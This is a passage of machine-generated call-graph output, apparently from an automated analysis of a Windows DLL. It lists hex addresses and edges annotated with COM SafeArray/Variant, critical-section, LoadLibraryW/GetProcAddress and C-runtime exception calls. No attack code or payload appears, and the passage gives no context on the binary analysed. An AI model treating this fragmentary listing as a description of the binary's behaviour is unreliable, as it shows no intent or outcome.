52041 6cea1ba1 ctype 52041->51930 52047 6cef9495 IsDebuggerPresent 52046->52047 52048 6cef9493 52046->52048 52832 6cf00036 52047->52832 52048->51890 52051 6cefce7e SetUnhandledExceptionFilter UnhandledExceptionFilter 52052 6cefce9b __call_reportfault 52051->52052 52053 6cefcea3 GetCurrentProcess TerminateProcess 52051->52053 52052->52053 52053->51890 52055 6cec655d 52054->52055 52059 6cec64c8 52054->52059 52056 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52055->52056 52057 6cec657d 52056->52057 52057->51941 52058 6cec651d 52058->52055 52093 6ce92f40 77 API calls 52058->52093 52059->52055 52059->52058 52090 6ce92f40 77 API calls 52059->52090 52062 6cec6535 52094 6cec6400 77 API calls std::tr1::_Xweak 52062->52094 52063 6cec64f5 52091 6cec6400 77 API calls std::tr1::_Xweak 52063->52091 52066 6cec650e 52092 6cefac75 RaiseException 52066->52092 52067 6cec654e 52095 6cefac75 RaiseException 52067->52095 52096 6cee6d40 52070->52096 52073 6cec6480 77 API calls 52074 6ce9364c 52073->52074 52103 6ce94b30 52074->52103 52076 6ce936a7 52107 6cec86e0 52076->52107 52078 6ce936bc 52079 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52078->52079 52080 6ce93701 52079->52080 52080->51943 52082 6cec231d 52081->52082 52083 6cec23aa 52082->52083 52084 6cef9bb5 77 API calls 52082->52084 52083->51945 52086 6cec2331 52084->52086 52085 6cec2374 ctype 52085->51945 52086->52085 52133 6cec2480 77 API calls 52086->52133 52088->51938 52089->51940 52090->52063 52091->52066 52092->52058 52093->52062 52094->52067 52095->52055 52097 6cec6480 77 API calls 52096->52097 52098 6cee6d7f 52097->52098 52115 6cec8d80 52098->52115 52101 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52102 6ce93630 52101->52102 52102->52073 52104 6ce94b65 52103->52104 52125 6ce94fa0 52104->52125 52106 6ce94b7f 52106->52076 52111 6cec8728 52107->52111 52108 6cec8765 52109 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52108->52109 52110 6cec878a 52109->52110 52110->52078 52111->52108 52131 6cec7cd0 77 API calls 3 library calls 52111->52131 52113 6cec8756 52132 6cefac75 RaiseException 52113->52132 52116 6cef9d66 _malloc 66 API calls 52115->52116 52120 6cec8d8f 52116->52120 52117 6cec8dbb 52117->52101 52118 6cef91f6 70 API calls 52118->52120 52119 6cec8dc1 std::exception::exception 52124 6cefac75 RaiseException 52119->52124 52120->52117 52120->52118 52120->52119 52123 6cef9d66 _malloc 66 API calls 52120->52123 52122 6cec8df0 52123->52120 52124->52122 52126 6cef9bb5 77 API calls 52125->52126 52127 6ce94fcf 52126->52127 52129 6ce94ff1 52127->52129 52130 6ce95050 81 API calls _memcpy_s 52127->52130 52129->52106 52130->52129 52131->52113 52132->52108 52133->52083 52135 6cefa28a __aulldiv 52134->52135 52135->51966 52144 6cefeae6 52136->52144 52139 6cef9e0c 52140 6cefeae6 __getptd 66 API calls 52139->52140 52141 6cebeb69 52140->52141 52141->51879 52142->51962 52143->51965 52149 6cefea6d GetLastError 52144->52149 52146 6cefeaee 52148 6cebeb61 52146->52148 52164 6cefd4f6 66 API calls 3 library calls 52146->52164 52148->52139 52150 6cefe948 ___set_flsgetvalue 3 API calls 52149->52150 52151 6cefea84 52150->52151 52152 6cefea8c 52151->52152 52153 6cefeada SetLastError 52151->52153 52165 6cefcb28 66 API calls __calloc_crt 52152->52165 52153->52146 52155 6cefea98 52155->52153 52156 6cefeaa0 DecodePointer 52155->52156 52157 6cefeab5 52156->52157 52158 6cefeab9 52157->52158 52159 6cefead1 52157->52159 52166 6cefe9b9 66 API calls 4 library calls 52158->52166 52167 6cef9d2c 66 API calls __dosmaperr 52159->52167 52162 6cefeac1 GetCurrentThreadId 52162->52153 52163 6cefead7 52163->52153 52165->52155 52166->52162 52167->52163 52168->51980 52169->51978 52172 6cea2db8 52170->52172 52177 6cea2e0d 52172->52177 52224 6ce95a30 77 API calls 2 library calls 52172->52224 52173 6cea2e02 52225 6cea3cc0 67 API calls 52173->52225 52174 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52176 6cea1746 52174->52176 52176->51992 52177->52174 52179 6cea3b3d 52178->52179 52180 6cef9bb5 77 API calls 52179->52180 52181 6cea3b6f 52180->52181 52182 6cea1a0c 52181->52182 52226 6cef9533 66 API calls std::exception::_Copy_str 52181->52226 52182->52021 52184 6cea3bae 52227 6cefac75 RaiseException 52184->52227 52186 6cea3bc3 52188 6cea3bdd 52187->52188 52189 6cef9bb5 77 API calls 52188->52189 52190 6cea3c0f 52189->52190 52191 6cea1a89 52190->52191 52228 6cef9533 66 API calls std::exception::_Copy_str 52190->52228 52191->52027 52193 6cea3c4e 52229 6cefac75 RaiseException 52193->52229 52195 6cea3c63 52197 6cea2acd 52196->52197 52201 6cea2ae6 52196->52201 52198 6cea2adf 52197->52198 52230 6cef90d8 67 API calls 2 library calls 52197->52230 52231 6cea31e0 77 API calls 2 library calls 52198->52231 52201->52038 52203 6cec30de 52202->52203 52204 6cec30f8 52202->52204 52232 6cea5fa0 52203->52232 52204->52039 52207 6cea69fe 52206->52207 52208 6cea6a1f 52206->52208 52253 6cea9110 52207->52253 52208->52039 52211 6cec42fe 52210->52211 52212 6cec431d 52210->52212 52378 6cea62c0 52211->52378 52212->52039 52215 6cea686e 52214->52215 52216 6cea6890 52214->52216 52405 6cea8bc0 52215->52405 52216->52039 52218->52038 52219->52034 52220->52033 52221->52041 52222->51990 52223->51993 52224->52173 52225->52177 52226->52184 52227->52186 52228->52193 52229->52195 52230->52198 52231->52201 52233 6cef9bb5 77 API calls 52232->52233 52234 6cea6003 52233->52234 52235 6cef9bb5 77 API calls 52234->52235 52236 6cea6028 52235->52236 52237 6cea5050 77 API calls 52236->52237 52238 6cea6042 52237->52238 52239 6cef9bb5 77 API calls 52238->52239 52240 6cea6049 52239->52240 52241 6cea5050 77 API calls 52240->52241 52242 6cea6067 52241->52242 52243 6cef9bb5 77 API calls 52242->52243 52244 6cea606e 52243->52244 52245 6cea5050 77 API calls 52244->52245 52246 6cea608b 52245->52246 52247 6cef9bb5 77 API calls 52246->52247 52248 6cea6092 52247->52248 52249 6cea5050 77 API calls 52248->52249 52250 6cea60ac 52249->52250 52251 6cea16b0 340 API calls 52250->52251 52252 6cea60de ctype 52251->52252 52252->52204 52254 6cea912c EnterCriticalSection 52253->52254 52255 6cea9121 52253->52255 52256 6cea9150 52254->52256 52255->52208 52257 6cea915b LeaveCriticalSection 52256->52257 52258 6cea916a EnterCriticalSection 52257->52258 52262 6cea923f 52257->52262 52259 6cea9185 52258->52259 52260 6cea9190 LeaveCriticalSection 52259->52260 52261 6cea91a1 52260->52261 52260->52262 52269 6ceb6b10 52261->52269 52262->52208 52273 6ceb6b64 52269->52273 52270 6ceb6f19 InterlockedCompareExchange 52272 6cea91f3 52270->52272 52272->52262 52340 6cea9840 52272->52340 52273->52270 52355 6cec2e20 52273->52355 52275 6ceb6edd 52275->52270 52276 6ceb6f12 SafeArrayDestroy 52275->52276 52276->52270 52277 6ceb6bc2 52277->52270 52277->52275 52358 6cec28c0 InterlockedCompareExchange 52277->52358 52279 6ceb6c6b 52279->52270 52279->52275 52280 6ceb6c7e SafeArrayGetLBound 52279->52280 52280->52275 52281 6ceb6c99 SafeArrayGetUBound 52280->52281 52281->52275 52282 6ceb6cb4 SafeArrayAccessData 52281->52282 52282->52275 52283 6ceb6cd5 52282->52283 52359 6ceb5760 67 API calls std::tr1::_Xweak 52283->52359 52285 6ceb6cf5 SafeArrayUnaccessData 52285->52275 52286 6ceb6d07 52285->52286 52286->52275 52360 6cea1690 77 API calls 52286->52360 52288 6ceb6d2c 52289 6cef9bb5 77 API calls 52288->52289 52290 6ceb6d3f 52289->52290 52291 6cea5050 77 API calls 52290->52291 52292 6ceb6d59 52291->52292 52293 6cef9bb5 77 API calls 52292->52293 52294 6ceb6d63 52293->52294 52295 6cea5050 77 API calls 52294->52295 52296 6ceb6d7f 52295->52296 52297 6cef9bb5 77 API calls 52296->52297 52298 6ceb6d86 52297->52298 52299 6cea5050 77 API calls 52298->52299 52300 6ceb6da0 52299->52300 52361 6cea50c0 77 API calls 52300->52361 52302 6ceb6dab 52303 6cef9bb5 77 API calls 52302->52303 52304 6ceb6db2 52303->52304 52305 6cea5050 77 API calls 52304->52305 52306 6ceb6dcf 52305->52306 52362 6cea50c0 77 API calls 52306->52362 52308 6ceb6dda 52309 6cef9bb5 77 API calls 52308->52309 52310 6ceb6de7 52309->52310 52311 6cea5050 77 API calls 52310->52311 52312 6ceb6e01 52311->52312 52363 6cea50c0 77 API calls 52312->52363 52314 6ceb6e0c 52315 6cef9bb5 77 API calls 52314->52315 52316 6ceb6e19 52315->52316 52317 6cea5050 77 API calls 52316->52317 52318 6ceb6e33 52317->52318 52319 6cef9bb5 77 API calls 52318->52319 52320 6ceb6e3a 52319->52320 52321 6cea5050 77 API calls 52320->52321 52322 6ceb6e58 52321->52322 52323 6cef9bb5 77 API calls 52322->52323 52324 6ceb6e5f 52323->52324 52325 6cea5050 77 API calls 52324->52325 52326 6ceb6e79 52325->52326 52364 6cea50c0 77 API calls 52326->52364 52328 6ceb6e84 52365 6cea50c0 77 API calls 52328->52365 52330 6ceb6e8f 52331 6cef9bb5 77 API calls 52330->52331 52332 6ceb6e9b 52331->52332 52333 6cea5050 77 API calls 52332->52333 52334 6ceb6eb5 52333->52334 52366 6cea50c0 77 API calls 52334->52366 52336 6ceb6ec0 52367 6cea50c0 77 API calls 52336->52367 52338 6ceb6ecb 52368 6cea2a40 340 API calls 52338->52368 52341 6cef9bb5 77 API calls 52340->52341 52342 6cea9865 52341->52342 52343 6cea9227 52342->52343 52369 6cef9533 66 API calls std::exception::_Copy_str 52342->52369 52348 6cea7140 52343->52348 52345 6cea98ab 52370 6cefac75 RaiseException 52345->52370 52347 6cea98c0 52371 6cec2820 52348->52371 52350 6cea719c 52354 6cea71d7 52350->52354 52376 6cef919e 67 API calls 3 library calls 52350->52376 52353 6cea71f8 52353->52208 52354->52353 52377 6cef9d2c 66 API calls __dosmaperr 52354->52377 52356 6cec2e67 52355->52356 52356->52277 52357 6cec2e9f InterlockedCompareExchange 52356->52357 52357->52277 52358->52279 52359->52285 52360->52288 52361->52302 52362->52308 52363->52314 52364->52328 52365->52330 52366->52336 52367->52338 52368->52275 52369->52345 52370->52347 52372 6cec2845 52371->52372 52373 6cec28af 52372->52373 52374 6cef9d66 _malloc 66 API calls 52372->52374 52373->52350 52375 6cec2876 52374->52375 52375->52350 52376->52354 52377->52353 52379 6cef9bb5 77 API calls 52378->52379 52380 6cea632b 52379->52380 52381 6cef9bb5 77 API calls 52380->52381 52382 6cea6350 52381->52382 52383 6cea5050 77 API calls 52382->52383 52384 6cea636e 52383->52384 52385 6cef9bb5 77 API calls 52384->52385 52386 6cea6375 52385->52386 52387 6cea5050 77 API calls 52386->52387 52388 6cea6392 52387->52388 52389 6cef9bb5 77 API calls 52388->52389 52390 6cea6399 52389->52390 52391 6cea5050 77 API calls 52390->52391 52392 6cea63b3 52391->52392 52393 6cef9bb5 77 API calls 52392->52393 52394 6cea63c9 52393->52394 52395 6cea6459 52394->52395 52396 6cea63d4 52394->52396 52403 6cef9533 66 API calls std::exception::_Copy_str 52395->52403 52398 6cea16b0 340 API calls 52396->52398 52402 6cea6402 ctype 52398->52402 52399 6cea646b 52404 6cefac75 RaiseException 52399->52404 52401 6cea6482 52402->52212 52403->52399 52404->52401 52406 6cea8bcc 52405->52406 52407 6cea8bd5 EnterCriticalSection 52405->52407 52406->52216 52415 6cebe030 52407->52415 52411 6cea8c13 LeaveCriticalSection 52411->52216 52416 6cebe05d 52415->52416 52417 6cebe090 52415->52417 52418 6cea8bec 52416->52418 52420 6cef9bb5 77 API calls 52416->52420 52419 6cef9bb5 77 API calls 52417->52419 52421 6ceab6c0 GetModuleHandleW 52418->52421 52419->52418 52420->52418 52422 6ceab72a GetProcAddress 52421->52422 52423 6ceab717 LoadLibraryW 52421->52423 52424 6ceab94c 52422->52424 52427 6ceab73e 52422->52427 52423->52422 52423->52424 52425 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52424->52425 52426 6cea8bfa 52425->52426 52426->52411 52434 6cea8c40 52426->52434 52427->52424 52428 6ceab85d 52427->52428 52448 6cefa116 80 API calls __mbstowcs_s_l 52428->52448 52430 6ceab875 GetModuleHandleW 52430->52424 52431 6ceab8aa GetProcAddress 52430->52431 52431->52424 52433 6ceab8f2 52431->52433 52433->52424 52449 6ceaa350 VariantInit VariantInit VariantInit 52434->52449 52435 6cea8c63 52436 6cea8cf9 52435->52436 52459 6cea8b10 EnterCriticalSection 52435->52459 52436->52411 52438 6cea8c83 52440 6cea8c9f 52438->52440 52442 6cea8ce2 52438->52442 52468 6ceab9a0 52438->52468 52476 6ceabab0 52440->52476 52442->52411 52443 6cea8cd3 52443->52442 52492 6cea8ff0 69 API calls std::tr1::_Xweak 52443->52492 52448->52430 52452 6ceaa3b5 52449->52452 52450 6ceaa505 VariantClear VariantClear VariantClear 52451 6ceaa52a 52450->52451 52451->52435 52452->52450 52453 6ceaa3e0 VariantCopy 52452->52453 52454 6ceaa3f9 52453->52454 52455 6ceaa3ff VariantClear 52453->52455 52454->52455 52456 6ceaa413 52455->52456 52456->52450 52457 6ceaa549 VariantClear VariantClear VariantClear 52456->52457 52458 6ceaa57a 52457->52458 52458->52435 52460 6cea8b4b 52459->52460 52461 6cea8b53 LeaveCriticalSection 52460->52461 52463 6cef9bb5 77 API calls 52460->52463 52461->52438 52464 6cea8b64 52463->52464 52465 6cea8b80 52464->52465 52493 6cea7370 79 API calls 2 library calls 52464->52493 52494 6cea96d0 77 API calls 52465->52494 52469 6ceab9dc 52468->52469 52470 6ceaba7a 52469->52470 52471 6cef9bb5 77 API calls 52469->52471 52470->52440 52472 6ceaba3a 52471->52472 52473 6ceaba6a 52472->52473 52539 6ceb5f00 77 API calls 2 library calls 52472->52539 52495 6ceb6fd0 52473->52495 52556 6cebb580 52476->52556 52478 6ceabaf3 52479 6cea8cbd 52478->52479 52561 6ceaaf30 VariantInit VariantInit VariantInit 52478->52561 52479->52442 52483 6cea8d60 EnterCriticalSection 52479->52483 52481 6ceabb0d 52481->52479 52482 6cef9bb5 77 API calls 52481->52482 52482->52479 52582 6cea9750 52483->52582 52486 6cea8e0a 52486->52443 52487 6cea8de5 52594 6cea8e20 52487->52594 52488 6cea8d97 52488->52486 52488->52487 52584 6ceabdf7 52488->52584 52490 6cea8e02 52490->52443 52492->52442 52493->52465 52494->52461 52498 6ceb700a 52495->52498 52538 6ceb78c2 52495->52538 52496 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52497 6ceb8326 52496->52497 52497->52470 52498->52538 52540 6cead920 52498->52540 52500 6ceb78b5 52501 6cead920 3 API calls 52500->52501 52500->52538 52502 6ceb7920 52501->52502 52503 6cead920 3 API calls 52502->52503 52502->52538 52504 6ceb7986 52503->52504 52505 6ceb79df 52504->52505 52506 6cead920 3 API calls 52504->52506 52505->52538 52548 6cead9f0 52505->52548 52506->52505 52508 6ceb7a7b 52509 6cead9f0 3 API calls 52508->52509 52508->52538 52510 6ceb7acb 52509->52510 52511 6cead9f0 3 API calls 52510->52511 52510->52538 52512 6ceb7b19 52511->52512 52513 6cead9f0 3 API calls 52512->52513 52512->52538 52514 6ceb7b90 52513->52514 52515 6cead9f0 3 API calls 52514->52515 52514->52538 52516 6ceb7c0b 52515->52516 52517 6cead9f0 3 API calls 52516->52517 52516->52538 52518 6ceb7ca5 52517->52518 52519 6cead9f0 3 API calls 52518->52519 52518->52538 52520 6ceb7d3f 52519->52520 52521 6cead9f0 3 API calls 52520->52521 52520->52538 52522 6ceb7dbb 52521->52522 52523 6cead9f0 3 API calls 52522->52523 52522->52538 52524 6ceb7e44 52523->52524 52525 6cead9f0 3 API calls 52524->52525 52524->52538 52526 6ceb7eb5 52525->52526 52527 6cead9f0 3 API calls 52526->52527 52526->52538 52528 6ceb7f6e 52527->52528 52529 6cead9f0 3 API calls 52528->52529 52528->52538 52530 6ceb8081 52529->52530 52531 6cead9f0 3 API calls 52530->52531 52530->52538 52532 6ceb80ca 52531->52532 52533 6cead9f0 3 API calls 52532->52533 52532->52538 52534 6ceb80f9 52533->52534 52535 6cead9f0 3 API calls 52534->52535 52534->52538 52536 6ceb8175 52535->52536 52537 6cead9f0 3 API calls 52536->52537 52536->52538 52537->52538 52538->52496 52539->52473 52541 6cead936 52540->52541 52542 6cead944 SafeArrayCreateVector 52540->52542 52541->52542 52544 6cead981 52542->52544 52545 6cead95a 52542->52545 52543 6cead960 SafeArrayPutElement 52543->52544 52543->52545 52546 6cead9ce SafeArrayDestroy 52544->52546 52547 6cead9d5 52544->52547 52545->52543 52545->52544 52546->52547 52547->52500 52549 6ceada03 52548->52549 52550 6ceada11 SafeArrayCreateVector 52548->52550 52549->52550 52551 6ceada27 SafeArrayPutElement 52550->52551 52555 6ceada48 52550->52555 52552 6ceada3d 52551->52552 52551->52555 52552->52551 52552->52555 52553 6ceada9d SafeArrayDestroy 52554 6ceadaa4 52553->52554 52554->52508 52555->52553 52555->52554 52557 6cebb5cb VariantInit VariantInit 52556->52557 52558 6cebb5b5 52556->52558 52560 6cebb5ee 52557->52560 52558->52478 52559 6cebb675 VariantClear VariantClear 52559->52478 52560->52559 52565 6ceaaf97 52561->52565 52562 6ceab22c VariantClear VariantClear VariantClear 52563 6ceab254 52562->52563 52563->52481 52564 6ceaaffe VariantCopy 52566 6ceab01d VariantClear 52564->52566 52567 6ceab017 52564->52567 52565->52562 52565->52564 52580 6ceab035 52566->52580 52567->52566 52568 6cef9bb5 77 API calls 52569 6ceab0ae 52568->52569 52581 6cefa136 66 API calls 2 library calls 52569->52581 52571 6ceab108 52572 6ceab28d VariantClear VariantClear VariantClear 52571->52572 52573 6ceab190 SafeArrayGetLBound SafeArrayGetUBound 52571->52573 52577 6ceab1fd ctype 52571->52577 52574 6ceab2ba 52572->52574 52575 6ceab28b 52573->52575 52576 6ceab1bf SafeArrayAccessData 52573->52576 52574->52481 52575->52572 52576->52575 52578 6ceab1d3 _memmove 52576->52578 52577->52562 52579 6ceab1eb SafeArrayUnaccessData 52578->52579 52579->52575 52579->52577 52580->52562 52580->52568 52581->52571 52583 6cea8d88 LeaveCriticalSection 52582->52583 52583->52486 52583->52488 52585 6ceabe01 52584->52585 52586 6ceabe2c SafeArrayDestroy 52585->52586 52588 6ceabe33 52585->52588 52586->52588 52587 6ceabefd ctype 52591 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52587->52591 52588->52587 52590 6ceabe6a IsBadReadPtr 52588->52590 52593 6ceabe77 52588->52593 52589 6ceaaf30 92 API calls 52589->52587 52590->52593 52592 6ceac00f 52591->52592 52592->52487 52593->52589 52595 6cea8e39 52594->52595 52596 6cea8e7c EnterCriticalSection 52595->52596 52602 6cea8f7f ctype 52595->52602 52597 6cea8e9e 52596->52597 52598 6cea8eac LeaveCriticalSection 52597->52598 52599 6cea8ebd 52598->52599 52598->52602 52600 6cef9bb5 77 API calls 52599->52600 52601 6cea8ec4 _memset 52600->52601 52604 6ceac020 VariantInit VariantInit VariantInit VariantInit 52601->52604 52602->52490 52607 6ceac098 52604->52607 52605 6ceac307 VariantClear VariantClear VariantClear VariantClear 52606 6ceac336 52605->52606 52606->52602 52607->52605 52612 6ceab300 52607->52612 52610 6ceac234 52610->52605 52611 6ceac10c 52611->52605 52611->52610 52623 6cebb6b0 VariantInit VariantInit 52611->52623 52621 6ceab364 52612->52621 52613 6ceab524 SafeArrayDestroy 52614 6ceab52e 52613->52614 52615 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52614->52615 52616 6ceab5a1 52615->52616 52616->52611 52617 6ceab3e1 SafeArrayGetLBound SafeArrayGetUBound 52619 6ceab4be 52617->52619 52617->52621 52618 6ceab416 SafeArrayGetElement 52618->52621 52622 6ceab3c8 52618->52622 52620 6ceab5d8 VariantClear 52619->52620 52619->52622 52620->52622 52621->52617 52621->52618 52621->52619 52621->52622 52622->52613 52622->52614 52624 6cebb75a 52623->52624 52625 6cebbe96 VariantClear VariantClear 52624->52625 52627 6cebb7b9 SafeArrayCreateVector 52624->52627 52626 6cebbeb6 52625->52626 52630 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52626->52630 52628 6cebb7ec SafeArrayPutElement VariantClear 52627->52628 52629 6cebb7e4 52627->52629 52633 6cebb80f 52628->52633 52680 6cebb8fa 52628->52680 52629->52628 52631 6cebbeef 52630->52631 52631->52610 52632 6cebbe8f SafeArrayDestroy 52632->52625 52634 6cebb913 52633->52634 52635 6cebb871 52633->52635 52633->52680 52634->52680 52759 6ceadcd0 10 API calls 52634->52759 52635->52680 52682 6cebdbc0 52635->52682 52638 6cebb93f 52638->52680 52760 6ceadcd0 10 API calls 52638->52760 52639 6cebb8d3 52690 6cebc850 VariantInit VariantInit SafeArrayCreateVector 52639->52690 52641 6cebb962 52643 6cebb8ef 52641->52643 52641->52680 52761 6ceadcd0 10 API calls 52641->52761 52645 6cebba0b VariantClear 52643->52645 52643->52680 52646 6cebba23 52645->52646 52645->52680 52647 6cef9bb5 77 API calls 52646->52647 52646->52680 52648 6cebbaa2 52647->52648 52701 6cebbf00 VariantInit VariantInit VariantInit VariantInit 52648->52701 52651 6cebbaeb 52653 6cebbb09 52651->52653 52651->52680 52763 6ceb47d0 107 API calls 52651->52763 52653->52680 52718 6ceb49b0 VariantInit VariantInit VariantInit SafeArrayCreateVector 52653->52718 52656 6cebbb2c 52656->52680 52730 6cebcd20 VariantInit VariantInit VariantInit SafeArrayCreateVector 52656->52730 52658 6cebbb49 52658->52680 52742 6ceb4170 VariantInit VariantInit SafeArrayCreateVector 52658->52742 52660 6cebbb85 52662 6cebbca2 52660->52662 52660->52680 52753 6ceac4a0 VariantInit VariantCopy 52660->52753 52664 6ceac4a0 2 API calls 52662->52664 52669 6cebbd78 52662->52669 52663 6cebbbdb VariantInit VariantInit SafeArrayCreateVector SafeArrayPutElement VariantClear 52755 6cebdb10 SafeArrayCreateVector SafeArrayPutElement 52663->52755 52666 6cebbcdd VariantInit VariantInit SafeArrayCreateVector SafeArrayPutElement VariantClear 52664->52666 52672 6cebdb10 3 API calls 52666->52672 52674 6cef9bb5 77 API calls 52669->52674 52669->52680 52673 6cebbd5d VariantClear VariantClear 52672->52673 52673->52669 52675 6cebbdf7 52674->52675 52676 6ceac4a0 2 API calls 52675->52676 52677 6cebbe10 52675->52677 52676->52677 52678 6cef9bb5 77 API calls 52677->52678 52677->52680 52679 6cebbe59 52678->52679 52679->52680 52681 6ceac4a0 2 API calls 52679->52681 52680->52625 52680->52632 52681->52680 52683 6cef9bb5 77 API calls 52682->52683 52684 6cebdbe0 52683->52684 52685 6cebdbe7 52684->52685 52764 6cef9533 66 API calls std::exception::_Copy_str 52684->52764 52685->52639 52687 6cebdc1b 52765 6cefac75 RaiseException 52687->52765 52689 6cebdc30 52691 6cebc8cc SafeArrayPutElement VariantClear 52690->52691 52692 6cebc8c4 52690->52692 52693 6cebcb2c 52691->52693 52697 6cebc8ef 52691->52697 52692->52691 52694 6cebcb38 SafeArrayDestroy 52693->52694 52695 6cebcb3f VariantClear VariantClear 52693->52695 52694->52695 52696 6cebcb5f 52695->52696 52696->52643 52697->52693 52698 6cebcb21 52697->52698 52769 6cef919e 67 API calls 3 library calls 52697->52769 52766 6ceb5b80 52698->52766 52702 6cebbf6c 52701->52702 52770 6cebc150 SafeArrayCreateVector 52702->52770 52705 6cebc150 6 API calls 52706 6cebbfdd 52705->52706 52707 6cebc096 52706->52707 52780 6cebdc40 52706->52780 52709 6cebc10e VariantClear VariantClear VariantClear VariantClear 52707->52709 52710 6cef948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52709->52710 52711 6cebbaca 52710->52711 52711->52651 52711->52680 52762 6ceb47d0 107 API calls 52711->52762 52712 6cebc00c 52795 6ceb44c0 VariantInit VariantInit SafeArrayCreateVector 52712->52795 52715 6cebc044 VariantInit VariantCopy 52716 6cebc05e 52715->52716 52716->52707 52717 6cebc07c VariantInit VariantCopy 52716->52717 52717->52707 52719 6ceb4a28 52718->52719 52720 6ceb4a30 SafeArrayPutElement VariantClear 52718->52720 52719->52720 52723 6ceb4a53 52720->52723 52729 6ceb4b52 52720->52729 52721 6ceb4b6c VariantClear VariantClear VariantClear 52721->52656 52722 6ceb4b65 SafeArrayDestroy 52722->52721 52723->52729 52809 6ceadb30 VariantInit SafeArrayCreateVector SafeArrayPutElement 52723->52809 52725 6ceb4b39 52725->52729 52813 6ceb56b0 52725->52813 52729->52721 52729->52722 52731 6cebcd99 52730->52731 52732 6cebcda1 SafeArrayPutElement VariantClear 52730->52732 52731->52732 52733 6cebd292 52732->52733 52736 6cebcdc6 52732->52736 52734 6cebd2ab VariantClear VariantClear VariantClear 52733->52734 52735 6cebd2a4 SafeArrayDestroy 52733->52735 52734->52658 52735->52734 52736->52733 52737 6ceadb30 5 API calls 52736->52737 52738 6cebd279 52737->52738 52738->52733 52739 6ceb56b0 83 API calls 52738->52739 52740 6cebd288 52739->52740 52741 6ceb6880 9 API calls 52740->52741 52741->52733 52743 6ceb41ec SafeArrayPutElement VariantClear 52742->52743 52744 6ceb41e4 52742->52744 52745 6ceb4460 52743->52745 52749 6ceb420f 52743->52749 52744->52743 52746 6ceb446c SafeArrayDestroy 52745->52746 52747 6ceb4473 VariantClear VariantClear 52745->52747 52746->52747 52748 6ceb4493 52747->52748 52748->52660 52749->52745 52750 6ceb4455 52749->52750 52831 6cef919e 67 API calls 3 library calls 52749->52831 52828 6cebddb0 52750->52828 52754 6ceac4b9 52753->52754 52754->52663 52756 6cebdb4f 52755->52756 52757 6cebbc60 VariantClear VariantClear 52756->52757 52758 6cebdba1 SafeArrayDestroy 52756->52758 52757->52662 52758->52757 52759->52638 52760->52641 52761->52643 52762->52651 52763->52653 52764->52687 52765->52689 52767 6ceb35c0 79 API calls 52766->52767 52768 6ceb5b90 52767->52768 52768->52693 52769->52698 52771 6cebc191 52770->52771 52774 6cebc1d9 52770->52774 52772 6cebc1af SafeArrayPutElement VariantClear 52771->52772 52771->52774 52772->52771 52773 6cebc239 52772->52773 52775 6cebc23d SafeArrayDestroy 52773->52775 52776 6cebbfb9 52773->52776 52774->52773 52777 6cebc20c VariantCopy 52774->52777 52775->52776 52776->52705 52776->52707 52778 6cebc22b VariantClear 52777->52778 52779 6cebc225 52777->52779 52778->52773 52779->52778 52781 6cebdc4d 52780->52781 52782 6cef9bb5 77 API calls 52781->52782 52783 6cebdc85 52782->52783 52784 6cebdc8c 52783->52784 52785 6cef9533 std::exception::exception 66 API calls 52783->52785 52784->52712 52786 6cebdcca 52785->52786 52787 6cefac75 __CxxThrowException@8 RaiseException 52786->52787 52788 6cebdcdf 52787->52788 52789 6cebdd23 52788->52789 52790 6cef9bb5 77 API calls 52788->52790 52789->52712 52791 6cebdcf8 52790->52791 52791->52789 52792 6cef9533 std::exception::exception 66 API calls 52791->52792 52793 6cebdd0e 52792->52793 52794 6cefac75 __CxxThrowException@8 RaiseException 52793->52794 52794->52789 52796 6ceb453a 52795->52796 52797 6ceb4542 SafeArrayPutElement VariantClear 52795->52797 52796->52797 52798 6ceb456a SafeArrayCreateVector SafeArrayPutElement 52797->52798 52807 6ceb476c 52797->52807 52799 6ceb459e SafeArrayPutElement 52798->52799 52798->52807 52802 6ceb45bf SafeArrayPutElement 52799->52802 52799->52807 52800 6ceb477d VariantClear VariantClear 52803 6ceb479d 52800->52803 52801 6ceb4776 SafeArrayDestroy 52801->52800 52804 6ceb45d8 52802->52804 52802->52807 52803->52707 52803->52715 52805 6ceb475f 52804->52805 52806 6cef919e std::tr1::_Xweak 67 API calls 52804->52806 52804->52807 52808 6cebde60 95 API calls 52805->52808 52806->52805 52807->52800 52807->52801 52808->52807 52810 6ceadb8c 52809->52810 52811 6ceadbf0 SafeArrayDestroy 52810->52811 52812 6ceadbf7 VariantClear 52810->52812 52811->52812 52812->52725 52814 6ceb56e0 52813->52814 52815 6ceb56f4 52813->52815 52814->52815 52817 6ceb57c0 81 API calls 52814->52817 52816 6ceb57c0 81 API calls 52815->52816 52818 6ceb570d VariantInit VariantCopy 52815->52818 52819 6ceb4b48 52815->52819 52816->52815 52817->52815 52818->52815 52818->52819 52820 6ceb6880 VariantInit VariantInit 52819->52820 52821 6cef91e1 52820->52821 52822 6ceb68cd SafeArrayCreateVector SafeArrayPutElement VariantClear 52821->52822 52823 6ceb6913 SafeArrayPutElement 52822->52823 52827 6ceb692d 52822->52827 52823->52827 52824 6ceb6980 SafeArrayDestroy 52825 6ceb6987 52824->52825 52826 6ceb6994 VariantClear VariantClear 52825->52826 52826->52729 52827->52824 52827->52825 52829 6ceb66a0 107 API calls 52828->52829 52830 6cebddd5 52829->52830 52830->52745 52831->52750 52832->52051 52833 6cea6bc0 52834 6cea6bde 52833->52834 52835 6cea6c26 52834->52835 52843 6cef9d21 52834->52843 52837 6cea6c1d 52838 6cea6bf7 52838->52837 52847 6cea5300 52838->52847 52842 6cea6c3c 52844 6cefe8d5 __EH_prolog3_catch 52843->52844 52845 6cef9bb5 77 API calls 52844->52845 52846 6cefe8ed _Fac_tidy 52845->52846 52846->52838 52848 6cea5322 52847->52848 